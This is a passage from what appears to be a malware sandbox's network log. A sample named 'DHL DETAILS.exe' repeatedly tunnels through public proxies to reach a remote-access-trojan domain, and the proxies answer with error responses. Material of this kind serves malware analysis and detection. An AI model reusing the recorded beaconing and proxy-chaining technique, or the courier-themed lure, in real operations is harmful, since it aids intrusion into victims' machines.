href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
282	192.168.2.5	50974	172.67.181.11	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.274583101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.430356979 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
283	192.168.2.5	50713	154.85.125.235	6446	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.280237913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.913292885 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
284	192.168.2.5	50949	50.63.12.33	61464	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.280323982 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.739379883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.270613909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.333127975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.567837954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
285	192.168.2.5	50988	104.20.56.71	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.280801058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.436382055 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
286	192.168.2.5	51004	104.16.105.15	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.287476063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.443212986 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
287	192.168.2.5	50707	171.244.140.160	9537	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.288590908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.051816940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.161232948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.380285025 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.880274057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
288	192.168.2.5	51013	23.227.38.198	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.291945934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.447725058 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
289	192.168.2.5	50473	117.160.250.134	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.291990995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.826493979 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
290	192.168.2.5	50944	192.163.201.131	43100	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.293375969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.770554066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.317483902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.395622015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.537050009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.724272966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
291	192.168.2.5	50607	120.197.40.219	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.295053005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.718941927 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
292	192.168.2.5	50998	50.63.12.33	58507	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.295381069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.770566940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.301875114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.364388943 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.536890030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.724226952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
293	192.168.2.5	50950	192.163.202.88	47585	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.295398951 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.754955053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.286267042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.348756075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.567843914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
294	192.168.2.5	51024	104.25.244.70	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.296264887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.452306032 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
295	192.168.2.5	50909	38.162.3.175	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.297059059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.718607903 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
296	192.168.2.5	51026	104.16.105.182	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.297190905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.453845024 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
297	192.168.2.5	50788	220.248.70.237	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.298135996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.626190901 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
298	192.168.2.5	51008	34.49.208.221	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.305011988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
299	192.168.2.5	50790	62.33.53.248	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.317584991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
300	192.168.2.5	50771	139.99.148.90	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.317667007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.680694103 CET	536	IN	HTTP/1.1 407 Proxy Authentication Required Server: squid/3.5.20 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3711 X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Proxy-Authenticate: Basic realm="Squid Basic Authentication" X-Cache: MISS from ns547184.ip-139-99-148.net X-Cache-Lookup: NONE from ns547184.ip-139-99-148.net:3128 Via: 1.1 ns547184.ip-139-99-148.net (squid/3.5.20) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f Data Ascii: <!DOCTYPE html PUBLIC "-/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
301	192.168.2.5	50942	157.185.157.151	26589	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
